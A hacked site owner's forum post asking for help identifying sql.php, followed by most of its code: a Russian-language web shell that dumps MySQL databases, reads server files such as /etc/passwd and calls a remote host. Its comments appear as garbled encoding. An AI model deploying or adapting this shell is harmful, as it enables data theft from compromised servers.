ttmw Posted March 31, 2011 Share Posted March 31, 2011 My site recently got hacked and i'm trying to rid of all the hacker files and search for anything suspicious...i've just come across a file in my root folder called sql.php that looks a little suspicious. I was wondering if anyone could confirm it is either useless or definitely spam/hack file. Maybe it will stop someone else getting any problems too. I've had to trim it to fit in a post, but im guessing someone will be able to tell sharpish if its a little dodgy... <?php error_reporting(0); @set_time_limit(0); @ini_set('max_execution_time',0); @set_magic_quotes_runtime(0); //ËÁ·‡‚ËÚ¸Òˇ ÓÚ ÒίÂÈ ÔË ÔÓÎÛ˜ÂÌËË ‰‡ÌÌ˚ı ËÁ هȷ $self=$HTTP_SERVER_VARS['PHP_SELF']; if(!ini_get("register_globals")){ import_request_variables("GPC"); } //≈ÒÎË php ‰Ó·‡‚ËÎ ÒίË, ËÁ·‡‚ËÚ¸Òˇ ÓÚ ÌËı.—ÎÂ¯Ë ·Û‰ÛÚ Û‰‡ÎÂÌ˚ Í‡Í ËÁ „ÎÓ·‡Î¸Ì˚ı //χÒÒË‚Ó‚, Ú‡Í Ë ËÁ ‚ÒÂı ÔÂÂÏÂÌÌ˚ı, ÍÓÚÓ˚ ӷ‡ÁÛ˛ÚÒˇ ÔË register_globals=on if (get_magic_quotes_gpc()) strips($GLOBALS); function strips(&$el) { if (is_array($el)) { foreach($el as $k=>$v) { if($k!='GLOBALS') { strips($el[$k]); } } } else { $el = stripslashes($el); } } if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { $file = "C:\\tmp\\dump_".$db.".sql"; $p_v=$SystemRoot."\my.ini"; $os="win"; } else { $file = "/tmp/dump_".$db.".sql"; $p_v="/etc/passwd"; } if ($HTTP_GET_VARS['send']=='send_http') { function download($file, $type = false, $name = false, $down = false) { if(!file_exists($file)) exit; if(!$name) $name = basename($file); if($down) $type = "application/force-download"; else if(!$type) $type = "application/download"; $disp = $down ? "attachment" : "inline"; header("Content-disposition: ".$disp."; filename=".$name); header("Content-length: ".filesize($file)); header("Content-type: ".$type); header("Connection: close"); header("Expires: 0"); set_time_limit(0); readfile($file); unlink($file); exit; } if ($HTTP_GET_VARS['strukt']=='d_strukt_bd' && $HTTP_GET_VARS['dump']=='bd'){ $host = $HTTP_SERVER_VARS["SERVER_NAME"]; $ip = $HTTP_SERVER_VARS["SERVER_ADDR"]; $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error"); mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error"); if (sizeof($tabs) == 0) { // ÔÓÎÛ˜‡ÂÏ ÒÔËÒÓÍ Ú‡·Îˈ ·‡Á˚ $res = mysql_query("SHOW TABLES FROM $db", $connection); if (mysql_num_rows($res) > 0) { while ($row = mysql_fetch_row($res)) { $tabs[] .= $row[0]; } } } // ÓÚÍ˚‚‡ÂÏ Ù‡ÈÎ ‰Îˇ Á‡ÔËÒË ‰‡ÏÔ‡ $fp = fopen($file, "w"); fputs ($fp, "# RST MySQL tools\n# Home page: http://rst.void.ru\n#\n# Host settings:\n# MySQL version: (".mysql_get_server_info().")\n# Date: ". date("F j, Y, g:i a")."\n# ".$host." (".$ip.")"." dump db \"".$db."\"\n#____________________________________________________________\n\n"); foreach($tabs as $tab) { if ($add_drop) { fputs($fp, "DROP TABLE IF EXISTS `".$tab."`;\n"); } // ÔÓÎÛ˜‡ÂÏ ÚÂÍÒÚ Á‡ÔÓÒ‡ ÒÓÁ‰‡Ìˡ ÒÚÛÍÚÛ˚ Ú‡·Îˈ˚ $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $connection) or die(mysql_error()); $row = mysql_fetch_row($res); fputs($fp, $row[1].";\n\n"); // ÔÓÎÛ˜‡ÂÏ ‰‡ÌÌ˚ ڇ·Îˈ˚ $res = mysql_query("SELECT * FROM `$tab`", $connection); if (mysql_num_rows($res) > 0) { while ($row = mysql_fetch_assoc($res)) { $keys = implode("`, `", array_keys($row)); $values = array_values($row); foreach($values as $k=>$v) {$values[$k] = addslashes($v);} $values = implode("', '", $values); $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; fputs($fp, $sql); } } fputs ($fp, "#---------------------------------------------------------------------------------\n\n"); } fclose($fp); } if ($HTTP_GET_VARS['strukt']=='d_strukt'){ $host = $HTTP_SERVER_VARS["SERVER_NAME"]; $ip = $HTTP_SERVER_VARS["SERVER_ADDR"]; $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error"); mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error"); $fp = fopen($file, "w"); fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n# MySQL version: (".mysql_get_server_info().")\n# Date: ". date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); // ÔÓÎÛ˜‡ÂÏ ÚÂÍÒÚ Á‡ÔÓÒ‡ ÒÓÁ‰‡Ìˡ ÒÚÛÍÚÛ˚ Ú‡·Îˈ˚ $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); $row = mysql_fetch_row($res); fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n"); fputs($fp, $row[1].";\n\n"); // ÔÓÎÛ˜‡ÂÏ ‰‡ÌÌ˚ ڇ·Îˈ˚ $res = mysql_query("SELECT * FROM `$tbl`", $connection); if (mysql_num_rows($res) > 0) { while ($row = mysql_fetch_assoc($res)) { $keys = implode("`, `", array_keys($row)); $values = array_values($row); foreach($values as $k=>$v) {$values[$k] = addslashes($v);} $values = implode("', '", $values); $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; fputs($fp, $sql); } } fclose($fp); } if ($HTTP_GET_VARS['strukt']=='t_strukt'){ $host = $HTTP_SERVER_VARS["SERVER_NAME"]; $ip = $HTTP_SERVER_VARS["SERVER_ADDR"]; $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error"); mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error"); $fp = fopen($file, "w"); fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n# MySQL version: (".mysql_get_server_info().")\n# Date: ". date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); $row = mysql_fetch_row($res); fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n"); fputs($fp, $row[1].";\n\n"); fclose($fp); } if ($HTTP_GET_VARS['strukt']=='d'){ $host = $HTTP_SERVER_VARS["SERVER_NAME"]; $ip = $HTTP_SERVER_VARS["SERVER_ADDR"]; $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error"); mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error"); $fp = fopen($file, "w"); $res = mysql_query("SELECT * FROM `$tbl`", $connection); if (mysql_num_rows($res) > 0) { while ($row = mysql_fetch_assoc($res)) { $keys = implode("`, `", array_keys($row)); $values = array_values($row); foreach($values as $k=>$v) {$values[$k] = addslashes($v);} $values = implode("', '", $values); $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; fputs($fp, $sql); } } fclose($fp); } download($f_dump); } function send_header() { header("Content-type: image/gif"); header("Cache-control: public"); header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); header("Cache-control: max-age=".(60*60*24*7)); header("Last-Modified: ".date("r",filemtime(__FILE__))); } if ($HTTP_GET_VARS['img']=='st_form_bg') { $st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs='; send_header(); echo base64_decode($st_form_bg); } if ($HTTP_GET_VARS['img']=='bg_f') { $bg_f='R0lGODlhAQARAMQAANXW1+7w8uvt79TV18jJye3w8+zu8Ofp7MfIydzd3+fo687P0Nvc3eHi5eP'. 'k5sPDw87OzwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BA'. 'AAAAAALAAAAAABABEAAAUP4IMsQOIcRlAISsMMEBECADs='; send_header(); echo base64_decode($bg_f); } if ($HTTP_GET_VARS['img']=='b_close') { $b_close='R0lGODlhdwAUAOYAANWEhdJYWNiwsc0PD9aTk88sLNA7O9rNztehotR1dk0AANQnJ4IAANc1Ndg9PWYAAL4'. 'AAM8PD6AAANg8POiLi8yEhb0sLIYAAGIAAMRYWOeGhtc5Oc8NDeR3d1gAANuEhU4AAKcAANJbW9Z1dt1XV8'. 'IAAONzc8QAAOqXl6gAAO2kpOJvb9IeHtuOj88QENYwMHUAANASEt9hYbAAAIwAAHkAAD0AAL0AAN5aWtQpK'. 'c4MDNROT0UAAKwAANtJSdQqKtAUFOqYmMwCAuR2dtuiou2jo95bW8l1dtc3N+ucnI4AAJMAAHoAAD4AANWK'. 'i+yfn5IAAOuZmdaVls4KCtlAQJQAAEAAANtMTOFra3EAAJEAALgAAOFpaWcAAOeFhXAAAN9dXeqVlTcAANg'. '6Ol4AANNnZ9m/wLUAANEbG9tKSoQAAOiOjuaCglYAAOJsbDQAANvc3cwAAAAAAAAAAAAAAAAAAAAAAAAAAA'. 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAAB3ABQAAAf/gFFFKk9ha4eIiYqLjI2Oj5CRk'. 'pOJGiY4GxwUQUkoFGygoaKjpKWmp6ipqqusokNGSBwzHV4UGh1uubq7vL2+v8DBwsPExbtgYy5nSjJYK1wk'. 'adLT1NXW19jZ2tvc1h8tRB/d2BsxW0tZPldpVD9o7/Dx8vP09fb3+PnxO3D9cCP66k05UwWGBwcTGiyIEKe'. 'hw4cQI0qcSLGixYsOB8A5UKYAxooQJDB4oAChQoYNBfgzEIeAvwQNzcg0w3KASzhmBrQ0A2CjTgJm4pShac'. 'BMmThmCAg1OnQmgaEsIwLteeDnyzg9AwCA2fCmgAFFZ8pUGkdAzoYhR5ZMuLChgQMA/xDgjAP3ZhwD/Q7MV'. 'UlAJYI4/QjohdkPKZwBPcvgRVCgXxmg/Yyq9Bgx8GC6AOz66/dXLgK+QyNDFgrnL1qRJE22bTggQBk4AOK0'. '7gmHdAKNAPAKCBAAZ2MBcXoD+A249uTXCfTCYUm8OIDhD4kLl621n8acGuE0n1s8ZW0z2h2mTc0WJWmfrzf'. 'OvWmdtj8Er2P3ThCfeGGXB5Q3jC97c22H/M2Xnl5mTGdYAnAcBVhQ1zWUWGkPjbfWSRC95gQcwE0HXnXPJf'. 'hQVi0tl1V8DYK3HHcgTqfXh3AEEKIIGAYHm4E4gYicjLGdF554qE24WoIBqCQFhgHodVQ/AKhUxv9rHJUhQ'. 'FEJvhYUeJAhIFdsjvVGFng69SSAS0E5BN6SOPW2m5HZBRllaWXo5VFiDfUGYYQ9qsYQXv585V8BeAbWkFz+'. 'FOePR/75o1iMCCpYWFmbRdXQntkNipU/OSq3nHeO9kMZj2rZ6RBvlLWmk0UFBMAchqV+pCpEv6XKWgCjOlR'. 'qrHe5ONFrptHZaXmrWsRfr8D+CqxF/TjKKUkv5MCCDiWc4eyz0EYrrbQZVGDBtNhmq62z1V677bfSWlDBEd'. 'OGQMMXHvAAhBA3pKCFGvDGK++89NZr77345qvvvvzKywQGIFjxxgk9QFEDBm0krPDCDDfs8MMQRyzxxBRXv'. 'DArCDa8oXEIF3ShgBgahyzyyCSXbPLJKKes8soso3wBGU20LPPMNNdsc8qBAAA7'; send_header(); echo base64_decode($b_close); } $n_img = create_function('$tag,$f_n,$img_c', 'print \'<\'.$tag.\'>\';$f_n("$img_c");'); $h_error="<br><table align=center width=500 height=70 bgcolor=red><b>Œ¯Ë·Í‡ ‚ Á‡ÔÓÒÂ:</b><tr><td align=center><br><h5>"; $f_error="</h5></td></tr></table> <CENTER><FORM><INPUT type=\"button\" value=\" << Õ‡Á‡‰ \" onClick=\"history.go(-1)\"><BR> </FORM></CENTER> </td></tr></table></td></tr></table> <table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000> <tr><td> <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2> <tr> <td align=center> free script ©RusH Security Team </td> </tr> </table> </td></tr> </table> </td></tr></table>"; print " <html><HEAD><TITLE>RST MySQL</TITLE> <META http-equiv=Content-Type Pragma: no-cache; content=\"text/html; charset=windows-1251\"> <style> td { font-family: verdana, arial, ms sans serif, sans-serif; font-size: 11px; color: #000000; } BODY { margin-top: 4px; margin-right: 4px; margin-bottom: 4px; margin-left: 4px; scrollbar-face-color: #b6b5b5; scrollbar-highlight-color: #758393; scrollbar-3dlight-color: #000000; scrollbar-darkshadow-color: #101842; scrollbar-shadow-color: #ffffff; scrollbar-arrow-color: #000000; scrollbar-track-color: #ffffff; } A:link {COLOR:blue; TEXT-DECORATION: none} A:visited { COLOR:blue; TEXT-DECORATION: none} A:active {COLOR:blue; TEXT-DECORATION: none} A:hover {color:red;TEXT-DECORATION: none} input, textarea, select { background-color: #EBEAEA; border-style: solid; border-width: 1px; font-family: verdana, arial, sans-serif; font-size: 11px; color: #333333; padding: 0px; } </style></HEAD><BODY>"; if ($sapi_type == "cgi") { $php_type="CGI"; } else { $php_type="ÏÓ‰Ûθ"; } $form_file=" <table width=80% align=center border=0> <tr><td align=center>◊ÚÂÌË ÔÓËÁ‚ÓθÌÓ„Ó Ù‡È·, Ò‚‡ ( <b>$server</b> )</td></tr> <tr><td> <table cellpadding=5 cellspacing=1 bgcolor=#FFFFFF border=0> <tr bgcolor=#DBDCDD><td align=center> œË ÛÒÎÓ‚ËË, ˜ÚÓ Ù‡ÈÎ ‰ÓÒÚÛÔÂÌ ‰Îˇ <b>˜ÚÂÌˡ</b> Ë ÔË Ì‡Î˘ËË Û ÔÓθÁÓ‚‡ÚÂΡ ÔË‚Ë΄ËË <b>FILE</b>, <b>SELECT</b>, <b>CREATE</b>, Ô‡‚ËθÌÓÏ ÔÛÚË Ë ËÏÂÌË - ‚ÓÁÏÓÊÌÓ ˜ÚÂÌË ÔÓËÁ‚ÓθÌÓ„Ó Ù‡È·. Œ·ıÓ‰ Ó„‡Ì˘ÂÌËÈ ÔË <b>safe_mode</b> Ë <b>safe_basedir</b> </td></tr></table></td></tr> <form method=\"get\" action=\"$self?f=x_file\"> <input type=\"hidden\" name=\"s\" value=\"$s\"> <input type=\"hidden\" name=\"server\" value=\"$server\"> <input type=\"hidden\" name=\"port\" value=\"$port\"> <input type=\"hidden\" name=\"login\" value=\"$login\"> <input type=\"hidden\" name=\"passwd\" value=\"$passwd\"> <tr><td align=center><br>œÓÎÌ˚È ÔÛÚ¸ Í Ù‡ÈÎÛ: <input type=\"text\" name=\"p_file\" value=\"$p_v\" size=\"40\"> <input type=\"submit\" value=\"ÔÓ͇Á‡Ú¸ Ù‡ÈÎ\"> </td></tr></table><br>"; $start_form="<br> <table align=center border=0 width=100% cellpadding=2 cellspacing=0 bgcolor=#FFFFFF> <tr> <td> <table align=center width=80% cellpadding=0 cellspacing=1 bgcolor=#000000> <tr><td> <table background=".$self."?img=bg_f border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2> <tr> <td width=25> <font face=Webdings size=6>Ņ</font> </td> <td> <font size=4><b>RST MySQL</b></font> <font color=#FFFFFF><b>v(2.0)</b></font> </td> <td width=33% align=right> ".date ("j F- Y- g:i")." </td> </tr> </table> </td></tr> </table> </td></tr> <tr><td> <table align=center border=0 width=80% cellpadding=2 cellspacing=0 bgcolor=#FFFFFF> <tr> <td bgcolor=#DBDCDD valign=top width=200><br> <center><b>”ÚËÎËÚ‡ ‰Îˇ ‡·ÓÚ˚ Ò MySQL</b></center><hr width=98%> <li>œÓÒÏÓÚ ·‡Á Ë Ú‡·Îˈ. <li>œÓËÁ‚ÓθÌ˚ Á‡ÔÓÒ˚ Í ¡ƒ. <li>–‰‡ÍÚËÓ‚‡ÌË ·‡Á Ë Ú‡·Îˈ. <li>ƒ‡ÏÔ˚ ¡ƒ ËÎË Ú‡·Îˈ.<hr width=98%> Type - FREE<br> Home page: <a href=http://rst.void.ru><b>http://rst.void.ru</b></a> <center><br><br><font face=Webdings size=+18 color=#B6B5B5>¨</font><center> </td> <td background=".$self."?img=st_form_bg bgcolor=#E6E7E9><center><font size=2> <br>ƒÎˇ ÒÓ‰ËÌÂÌˡ Ò Ò‚ÂÓÏ MySQL ‚‚‰ËÚ <b>»Ãfl</b>, <b>œ¿–ŒÀ‹</b> (ÔÓθÁÓ‚‡ÚÂΡ MySQL) Ë ËÏˇ <b>’Œ—“¿</b>.</font></center><br> <li>≈ÒÎË ÎÓ„ËÌ ˛Á‡ mysql Ì Û͇Á‡Ì ˇ‚ÌÓ, ÔÓ ÛÏÓΘ‡Ì˲ ÔÓ‰ÒÚ‡‚ΡÂÚÒˇ ËÏˇ ‚·‰Âθˆ‡ ÔÓˆÂÒÒ‡. <li>≈ÒÎË Ô‡Óθ ˛Á‡ mysql Ì Û͇Á‡Ì ˇ‚ÌÓ, ÔÓ ÛÏÓΘ‡Ì˲ ÔÓ‰ÒÚ‡‚ΡÂÚÒˇ ÔÛÒÚÓÈ Ô‡Óθ. <li>≈ÒÎË ËÏˇ Ò‚‚‡ mysql Ì Û͇Á‡ÌÓ ˇ‚ÌÓ, ÔÓ ÛÏÓΘ‡Ì˲ ÔÓ‰ÒÚ‡‚ΡÂÚÒˇ <b>localhost</b> <li>≈ÒÎË ÔÓÚ ‰Îˇ Ò‚‚‡ mysql Ì Û͇Á‡Ì ˇ‚ÌÓ, ÔÓ‰ÒÚ‡‚ΡÂÚÒˇ ÔÓÚ ÔÓ ÛÏÓΘ‡Ì˲, Ó·˚˜ÌÓ (<b>3306</b>)<br><br> <center>¬ÂÒˡ PHP (<b>".phpversion()."</b>) ID PHP script (<b>".get_current_user( )."</b>)</center> <br><table align=center> <tr><td>ËÏˇ ˛Á‡ MySQL</td><td align=right>Ô‡Óθ ˛Á‡ MySQL </td></tr> <form method=\"get\" action=\"$self\"> <input type=\"hidden\" name=\"s\" value=\"y\"> <tr> <td><input type=\"text\" name=\"login\" value=\"root\" maxlength=\"64\"></td> <td align=right><input type=\"text\" name=\"passwd\" value=\"$passwd\" maxlength=\"64\"></td> </tr> <tr><td>—‚ MySQL</td><td>ÔÓÚ</td></tr> <tr> <td><input type=\"text\" name=\"server\" value=\"localhost\" maxlength=\"64\"></td> <td><input type=\"text\" name=\"port\" value=\"3306\" maxlength=\"6\" size=\"3\"> <input type=\"submit\" value=\"ÔÓ‰Íβ˜ËÚ¸Òˇ\"></td> </tr></table><br> </td> </tr> </table> </td></tr> <tr><td> <table align=center width=80% cellpadding=0 cellspacing=1 bgcolor=#000000> <tr><td> <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2> <tr> <td align=center> free script ©RusH Security Team </td> </tr> </table> </td></tr> </table> </td></tr></table><center><font size=-1 color=#D0D1D2>(coded by dinggo)</font></center> "; if ($os =='win') { $os="OS- <b>".$HTTP_ENV_VARS["OS"]."</b>"; }else{ $str_k=$_ENV["BOOT_FILE"]; $k=preg_replace ("/[a-zA-Z\/]/","", $str_k); $os="OS\Kernel: <b>".$_ENV["BOOT_IMAGE"].$k."</b>"; } if (!isset($s) || $HTTP_GET_VARS[s] != 'y') { print $start_form; $serv = array(127,192,172,10); $adrr=@explode('.', $HTTP_SERVER_VARS["SERVER_ADDR"]); if (!in_array($adrr[0], $serv)) { //ÔË ÔÓˇ‚ÎÂÌËË ÌÓ‚ÓÈ ‚ÂÒËË ÛÚËÎËÚ˚ ÔÓ͇ÊÂÏ ˜ÚÓ ‰ÓÒÚÛÔ̇ //ÌÓ‚‡ˇ ‚ÂÒˡ Ë Ô‰ÎÓÊËÏ Á‡„ÛÁËÚ¸ ÂÂ Ò Ò‡ÈÚ‡ @print "<img src=\"http://rst.void.ru/version_sql/version.php\" border=0 height=0>"; @readfile ("http://rst.void.ru/version_sql/version.php"); } exit; } $form_ad_b="<br> <table width=80% align=center border=0 cellpadding=0 cellspacing=1 bgcolor=#FFFFFF> <tr> <td> <table width=100% align=center border=0 cellpadding=4 cellspacing=0 bgcolor=#DBDCDD> <td> MySQL <b>$server</b> v.(<b>".mysql_get_server_info()."</b>) </td> <td align=center> <b>".$HTTP_SERVER_VARS["SERVER_SOFTWARE"]."</b> </td> <td align=right> ¬ÂÒˡ PHP (<b>".phpversion()."</b>) $php_type </td> </tr> <tr bgcolor=#DBDCDD> <td> IP:<b>".$HTTP_SERVER_VARS["SERVER_ADDR"]."</b> Name:<b>".$HTTP_SERVER_VARS["SERVER_NAME"]."</b> </td> <td align=center> ID PHP script (<b>".get_current_user( )."</b>) </td> <td align=right> $os </td> </tr> </table> </td></tr></table> <table width=80% align=center border=0 cellpadding=5 cellspacing=1> <tr> <td> <a href=\"$self?s=$s&stat=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>—Ú‡ÚËÒÚË͇ MySQL</b></a> </td> <td align=center> <a href=\"$self?s=$s&php=ok\" target=\"_blank\"><b>»ÌÙÓχˆËˇ PHP (ALL)</b></a> </td> <td align=right> <a href=\"$self?s=$s&proc=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>œÓˆÂÒÒ˚ MySQL </b></a> </td> </tr> <tr> <td> <a href=\"$self?s=$s&apc=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>œÂÂÏÂÌÌ˚ Apache </b></a> </td> <td align=center> <a href=\"$self?s=$s&var=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>œÂÂÏÂÌÌ˚ MySQL </b></a> </td> <td align=right> <a href=\"$self?s=$s&f=x_file&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"œÓÒÏÓÚ ÔÓËÁ‚ÓθÌÓ„Ó Ù‡È· Ò‚‡ ‰‡Ê ÔË ‚Íβ˜ÂÌÓÏ safe_mode Ë safe_mode_exec_dir\"><b>‘‡ÈÎ *?</b></a> </td> </tr> </table><br> <table width=300 align=center cellpadding=0 cellspacing=1 bgcolor=#FFFFFF> <tr bgcolor=#DBDCDD><td> <table align=center cellpadding=0 cellspacing=0> <tr bgcolor=#DBDCDD> <td> <table cellpadding=4><tr><td><b>—ÓÁ‰‡Ú¸ ÌÓ‚Û˛ ·‡ÁÛ ‰‡ÌÌ˚ı</b></td></tr><tr><td> <form method=\"get\" action=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\"> <input type=\"hidden\" name=\"s\" value=\"$s\"> <input type=\"hidden\" name=\"server\" value=\"$server\"> <input type=\"hidden\" name=\"port\" value=\"$port\"> <input type=\"hidden\" name=\"login\" value=\"$login\"> <input type=\"hidden\" name=\"passwd\" value=\"$passwd\"> <input type=\"text\" name=\"new_db\" value=\"\" maxlength=\"64\"> <input type=\"submit\" value=\"ÒÓÁ‰‡Ú¸\"></td> </tr></table> </td> </tr> </table> </td> </tr></table></form> <table width=80% align=center border=0 cellpadding=0> <tr align=right> <td width=85%></td> <td width=15> <a href=$self><img src=".$self."?img=b_close border=0 title=close></a> </td> </tr> </table> "; $cnt_b=mysql_num_rows(mysql_list_dbs()); // ÍÓÎ-‚Ó ·‡Á mysql Ò‚‡ print " <table align=center border=0 width=100% cellpadding=1 cellspacing=0 bgcolor=#FFFFFF> <tr> <td> <table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000> <tr><td> <table background=".$self."?img=bg_f border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2> <tr> <td> <font face=Webdings size=6>Ņ</font> </td> <td width=33%> <font size=4><b>RST MySQL</b></font> </td> <td width=33% align=center> <font color=blue><b>$server</b></font> [CONNECTION Ok] ¬ÒÂ„Ó ·‡Á: <b>$cnt_b</b> </td> <td width=33% align=right> ".date ("j F- Y- g:i")." </td> </tr> </table> </td></tr> </table> </td></tr> <tr><td> <table background=".$self."?img=send_img align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#FFFFFF> <tr> <td bgcolor=#DBDCDD valign=top width=170>"; if (isset($server)&&isset($port)&&isset($login)&&isset($passwd)){ $connection = mysql_connect($server.":".$port, $login, $passwd) or die("$header<table align=center width=80% bgcolor=red><tr><br>Œ¯Ë·Í‡ ÒÓ‰ËÌÂÌˡ Ò MySQL Ò‚ÂÓÏ <b>$server</b><td><center><font size=2><b>".mysql_error()."</b></font></center><br><b>¬ÂÓˇÚÌ˚ ӯ˷ÍË:</b><li>Õ ԇ‚ËθÌ˚È ‡‰ÂÒ Ò‚‡ <b>$server</b><li>Õ ԇ‚ËθÌ˚È ÌÓÏ ÔÓÚ‡ <b>$port</b><li>Õ ‚ÂÌÓ ËÏˇ (login) ˛Á‡ mysql <b>$login</b><li>Õ ‚ÂÌ˚È Ô‡Óθ (password) ˛Á‡ mysql <b>$passwd</b><li>ƒÓÒÚÛÔ Í Ò‚ÂÛ $server Á‡Ô¢ÂÌ Ò ‡‰ÂÒ‡ <b>".getenv('REMOTE_ADDR')."</b><li>”‰‡ÎÂÌÌ˚È Ò‚ ‚ÂÏÂÌÌÓ Ì ‰ÓÒÚÛÔÂÌ</td></tr></table><br></td></tr></table><script>alert('Õ ‚ÓÁÏÓÊÌÓ ÛÒÚ‡ÌÓ‚ËÚ¸ ÒÓ‰ËÌÂÌËÂ Ò MySQL Ò‚ÂÓÏ $server \\n\\n œÓ‚¸Ú ԇ‚ËθÌÓÒÚ¸ ‚ıÓ‰ˇ˘Ëı ‰‡ÌÌ˚ı:\\n\\nÒ‚ $server\\nÔÓÚ $port\\nËÏˇ $login\\nÔ‡Óθ $passwd');</script><head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self'></head>"); } /*---------------------- L E F T B L O C K (menu bd)! -------------------*/ /*œÓ͇Á‡Ú¸ ‚Ò ·‡Á˚ Ò‚‡*/ if ($connection&&!isset($db)) { print "<table border=0 cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=#B6B5B5 align=center>". "<a href=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"¬ÂÌÛÚ¸Òˇ ‚ ̇˜‡ÎÓ Ë Ó·ÌÓ‚ËÚ¸ ÒÔËÒÓÍ ·‡Á\"><font color=green><b>". "œÓ͇Á‡Ú¸ ‚Ò ·‡Á˚</b></font></a></td></tr></table>"; $result = mysql_list_dbs($connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); while ( $row=mysql_fetch_row($result) ){ $cnt_title=mysql_num_rows(mysql_list_tables($row[0])); //ÍÓÎ-‚Ó Ú‡·Îˈ ·‡Á˚ print "<table valign=top border=0 width=100% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF><tr><td bgcolor=#DBDCDD>"; if ($cnt_title < 1) { print "<a href=\"$_SERVER[php_SELF]?s=$s&db=$row[0]&cr_tbl=new&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"¬ÒÂ„Ó Ú‡·Îˈ $cnt_title\"><b>$row[0]</b></a>"; }else{ print "<a href=\"$_SERVER[php_SELF]?s=$s&db=$row[0]&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"¬ÒÂ„Ó Ú‡·Îˈ $cnt_title\"><b>$row[0]</b></a>"; } print "</td></tr></table>"; } } // ÒÔËÒÓÍ Ú‡·Îˈ ·‡Á˚ ‰‡ÌÌ˚ı if (isset($db)){ $result=mysql_list_tables($db) or die ("$h_error<b>".mysql_error()."</b>$f_error<head><META HTTP-EQUIV='Refresh' CONTENT='5;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>"); print "<table border=0 cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=#B6B5B5 align=center>". "<a href=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\"><font color=green><b>". "œÓ͇Á‡Ú¸ ‚Ò ·‡Á˚</b></font></a></td></tr><tr><td></td></tr><tr><td></td></tr></table>"; print "<table cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=silver align=center>". "---[ <a href=\"$_SERVER[php_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db\" title=\"Ó·ÌÓ‚ËÚ¸ ÒÔËÒÓÍ Ú‡·Îˈ\"><b>$db</b></a>". " ]---</a></td></tr><tr><td></td></tr><tr><td></td></tr></table>"; while ( $row=mysql_fetch_array($result) ){ //ÔÓÎÛ˜‡ÂÏ ÍÓ΢ÂÒÚ‚Ó ÒÚÓÍ(Á‡ÔËÒÂÈ) ‚ Ú‡·Îˈ $count=mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row= mysql_fetch_array($count); print "<table valign=top border=0 width=100% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>". "<tr><td bgcolor=#DBDCDD>"; if ($count_row[0] < 1) { print "<a href=\"$_SERVER[php_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$row[0]&nn_row=ok\">$row[0]</a> ($count_row[0])</td></tr></table>"; }else{ print "<a href=\"$_SERVER[php_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$row[0]&limit_start=0&limit_count=5\">$row[0]</a> ($count_row[0])</td></tr></table>"; } @mysql_free_result($count); } } /*---------------------- END L E F T B L O C K (menu bd)! 